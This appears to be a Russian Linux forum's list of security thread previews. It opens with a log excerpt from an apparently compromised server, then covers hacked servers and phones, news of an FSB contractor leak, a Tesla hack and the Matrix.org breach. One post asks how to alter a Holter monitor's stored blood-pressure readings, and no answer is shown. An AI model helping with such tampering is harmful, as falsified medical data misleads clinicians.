‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:37 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:42 localhost brainy[750]: recv() ok. Receiving bytes: 7, errno=10, ip -4 a Dec 30 14:43:42 localhost brainy[25646]: INFO PARENT: dup2. argument (in): -1 Dec 30 14:43:42 localhost brainy[750]: READ: read bytes 92., errno=10 Dec 30 14:43:42 localhost brainy[750]: READ: read bytes 311., errno=10 Dec 30 14:43:42 localhost brainy[750]: READ: no data., errno=10 Dec 30 14:43:42 localhost brainy[750]: parent 750: child 25646, status 0x0000 Dec 30 14:43:42 localhost brainy[750]: Exit from fork(): parent 750, errno=10 Dec 30 14:43:43 localhost systemd: Started Session c749 of user root.

 ,

Demidzzio ()

Last что-то скрывает...

Друзья, обнаружил в локалке брутфорсер, начал судорожно проверять серверную инфраструктуру. В первую очередь гипервизор, у команды last странный вывод, у некоторых записей отсутствуют ip, хотя вход вроде как по сети.

( читать дальше... )

Это её нормальный вывод, или однозначно взломан? Команда lastb, говорит всего о 3-х неудачных входах за 3,5 месяца существования сервера, подозреваю, что я ошибался с паролем почаще, но может и кажется.

 

poedyatel ()

Увели виртуалку с БД

Есть у нас в компании муд.. к разработчик, который вчера отключил iptables(почему этот муд..к имеет рутовый доступ, это отдельная тема) на виртуалке с сервером PostgreSQL, не прошло и часу, как его увели китайцы, запускались процессы от левых учеток с конектами к китайским ip (возможно ip от прокси, впн и тд, может и не китайцы) ,добавляет печали ещё то, что бэкапы бд тоже лежали на этом серваке, повезло что они не успели потереть скрытые учетки, вмку я вернул, но терзают сомнения что теперь в ней есть бэкдоры и прочее, может пожалуйста кто подсказать как это максимально тщательно проверить? все левые учетки и их файлы удалил, вроде пока попыток запуска лишних процессов и коннектов не видно(сервак отключён от сети) проверил все текущие учетки,но сильно сомневаюсь что все вернул на круги свои

 ,

w1rox ()

Android был взломан, как произошло? Miui?

Телефон Xiaomi со свежим MIUI. Из стока ничего не выпилено, установлено пара игрушек из маркета. Ничего из левых источников, или свежеустановленного. 2 дня назад, неожиданно всплывает уведомление «В ваш аккаунт вконтакте авторизировались из Гуанчджоу, Китай». Сразу сменила пароль в течение минуты, перелогинилась, с этим проблем больше не было. Сегодня, сказала, телефон звонил на работе, но в списке вызовов ничего нет.

Утверждает, что якобы, не заходила ни на какие подозрительные сайты и не проходила ни по каким ссылкам. Только пару раз на алик, и проверить сообщения вконтакте/одноклассники из приложений, да и там не засиживалась. Ещё вотсапп с группой с работы и всё. Нигде пароли не вводила вообще за это время и даже новости нигде не читала.

Что произошло с телефоном? Активировалось какое-то шпионское миуи-говно встроенное? Я перепрошью ей завтра на линейку, но хочется знать. И что дополнительно можно предпринять?

 , , ,

fehhner ()

Меня пытались взломать, вектор атаки?

История проста: подключился к публичной ТД Wi-Fi в кофейном киоске без VPN через 3 часа на почту приходит уведомление, что вошел с нового устройства Samsung Galaxy S9, которого у меня отродясь не было.

Ну я первым делом я 9-ку «хакирскую» отвязал и пароль сменил.

Вопрос в другом где и как слили данные аутентификации? Вроде везде https… бекдор в роутере, который раздавал wi-fi, dns-спуфинг, что еще?

 , ,

Twissel ()

Прошивка хотлера

Всем привет. Такой вопрос. Делал замеры давления через холтер. Он пишет себе их в память, а потом снимаются результаты в больнице. Есть какая нибудь возможность подключится к нему, и поменять результаты на нужные? Есть порт USB в нём

 , ,

SlavaPWNZ ()

Хакеры взломали сервер крупного подрядчика российских спецслужб

Хакеры взломали сервер крупного подрядчика российских спецслужб и ведомств, а затем поделились с журналистами описаниями десятков непубличных проектов в области интернета: от деанонимизации пользователей браузера Tor до исследования уязвимости торрентов. Не исключено, что это крупнейшая в истории утечка данных о работе российских спецслужб в интернете. (...)

Проект «Наутилус-С» был создан, чтобы деанонимизировать пользователей браузера Tor. (...)

Более ранняя версия проекта «Наутилус» - без буквы «С» через дефис после названия - была посвящена сбору информации о пользователях соцсетей. (...)

В рамках научно-исследовательской работы «Награда», которая проводилась в 2013-2014 годы, «Сайтэку» предстояло исследовать «возможности разработки комплекса проникновения и скрытого использования ресурсов пиринговых и гибридных сетей», говорится во взломанных документах. (...)

Заказчиком другой работы под названием «Наставник» была войсковая часть № 71330 (предположительно - радиоэлектронная разведка ФСБ России). Цель - мониторинг электронной почты по выбору заказчика. Проект был рассчитан на 2013-2014 годы. (...) Согласно документации, предоставленной хакерами, программу «Наставник» можно настроить так, чтобы она проверяла почту нужных респондентов в заданный промежуток времени или собирала «интеллектуальную группу добычи» по заданным словосочетаниям. (...)

Проект «Надежда» посвящен созданию программы, которая накапливает и визуализирует информацию о том, как российский сегмент интернета связан с глобальной сетью. Заказчиком работы, проводившейся в 2013-2014 годы, стала все та же войсковая часть № 71330. (...)

Программа «Налог-3» позволяет в ручном режиме убирать из информационной системы ФНС данные лиц, находящихся под госохраной или госзащитой.

https://www.bbc.com/russian/features-49050982

https://www.zdnet.com/article/hackers-breach-fsb-contractor-expose-tor-deanon...

 

FiXer ()

Внедрение вредоносного ПО в архивные, старые версий Pale Moon

 , ,

Deleted ()

Ростелеком ворует пользовательские данные?

Только я возмутился хамскому поведению «ростелекома», как мне дают новую интересную историю сканирования портов пользователя через браузер. Понятно, что эта штука сработает как нужно лишь если в браузере есть дыры. Но осадочек-то остался!

Насчет советов вроде «перейди с ростелекома на другого провайдера» заранее сообщаю: у нас ростелеком находится в состоянии монополиста. Потому что у «мегафона» (от которого я благополучно в пользу МТС отказался) в нашем ауле только EDGE, билайн вообще еле-еле работает, а МТС показывает 4G лишь на работе, дома он — все тот же 2G (и лишь иногда 3G кажет)! Вот и остается лишь проводной ростелеком ☹

 , , ,

Eddy_Em ()

Сброс пароля

Меня тут сегодня почему-то разлогинило, после чего я не смог залогиниться, используя свой пароль — пришлось выполнить процедуру сброса пароля. Что случилось?

jollheef, это как-то связано с удалёнными в Ознакомте лоха с личной безоасностью.​?

maxcom

 , , , ,

h578b1bde ()

Злобные хакеры опять взломали Tesla Model S и управляли джойстиком

Больше IoT, говорили они!
Всё в Интернет, говорили они!
Удобные сервисы, говорили они!
Нам нечего скрывать, говорили они!
В общем не расстраивайтесь, если ваш недруг отправит вас в столб на скорости больше сотник км/ч. И да, киллеры с винтовками больше не нужны. Осталось подождать умного ИИ, тога мешки с костями останутся в меньшенстве и будут стёрты с лица Земли. Может поэтому Илон стремится на Марс?

Исследователи из Tencent Keen Security Lab успешно активировали систему автопилота Tesla Autopilot автомобиля Tesla, получив над ней контроль, о чём было сообщено в новой публикации, которая подробно описывает детали исследования.

Группа, ранее уже демонстрировавшая свои изыскания на конференции по безопасности Black Hat USA 2018, опубликовала видео, демонстрирующее взлом. Новый доклад описывает три способа заполучить контроль над системой автопилота автомобиля путём использования нескольких уязвимостей в электронном блоке управления (англ. — electronic control unit, ECU).

 ,

Promusik ()

Matrix.org взломали. Дважды.

Для Ъ:

https://twitter.com/matrixdotorg/status/1116304867683905537
https://www.opennet.ru/opennews/art.shtml?num=50501
https://matrix.org/blog/2019/04/11/security-incident
https://github.com/matrixnotorg/matrixnotorg.github.io

На https://github.com/matrix-org/matrix.org/issues взломщик (matrixnotorg) оставил результаты «исследования».

Не используйте большой централизованный сервер, поднимите свой. Это не так дорого и очень просто.

 , , , ,

commagray ()